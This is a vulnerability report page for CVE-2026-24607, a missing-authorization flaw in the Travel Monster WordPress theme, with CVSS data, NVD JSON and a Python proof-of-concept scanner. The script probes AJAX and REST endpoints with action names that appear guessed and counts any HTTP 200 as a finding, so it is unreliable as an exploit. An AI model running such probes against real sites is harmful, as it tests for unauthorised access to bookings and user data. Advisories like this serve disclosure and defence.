Security Vulnerability Report
中文
CVE-2026-24607 CVSS 5.3 MEDIUM

CVE-2026-24607

Published: 2026-01-23 15:16:20
Last Modified: 2026-04-28 15:16:19

Description

Missing Authorization vulnerability in wptravelengine Travel Monster travel-monster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Monster: from n/a through <= 1.3.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Travel Monster Theme <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24607 PoC - Missing Authorization in Travel Monster Theme # Target: WordPress site with Travel Monster Theme <= 1.3.3 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-24607 Missing Authorization vulnerability in Travel Monster theme """ # Common AJAX endpoints used by Travel Monster theme endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/', '/?rest_route=/wp/v2/' ] # Sensitive actions that should require authentication sensitive_actions = [ 'travel_monster_get_bookings', 'travel_monster_export_data', 'travel_monster_get_settings', 'travel_monster_get_users', 'travel_monster_modify_options' ] print(f'[*] Testing target: {target_url}') print(f'[*] Vulnerability: CVE-2026-24607 - Missing Authorization') print(f'[*] Affected: Travel Monster Theme <= 1.3.3\n') for endpoint in endpoints: for action in sensitive_actions: try: if 'admin-ajax.php' in endpoint: data = {'action': action} response = requests.post(target_url + endpoint, data=data, timeout=10) else: response = requests.get(target_url + endpoint + action, timeout=10) # Check for successful unauthorized access if response.status_code == 200: print(f'[+] VULNERABLE: {endpoint} with action {action}') print(f' Status: {response.status_code}') print(f' Response preview: {response.text[:200]}...') print() return True else: print(f'[-] Protected: {endpoint} with action {action} (Status: {response.status_code})') except requests.exceptions.RequestException as e: print(f'[!] Error testing {endpoint}: {e}') print('\n[*] No obvious vulnerability found') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-24607.py <target_url>') print('Example: python cve-2026-24607.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24607", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.567", "lastModified": "2026-04-28T15:16:19.080", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wptravelengine Travel Monster travel-monster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Monster: from n/a through <= 1.3.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en wptravelengine Travel Monster travel-monster permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Travel Monster: desde n/a hasta &lt;= 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/travel-monster/vulnerability/wordpress-travel-monster-theme-1-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}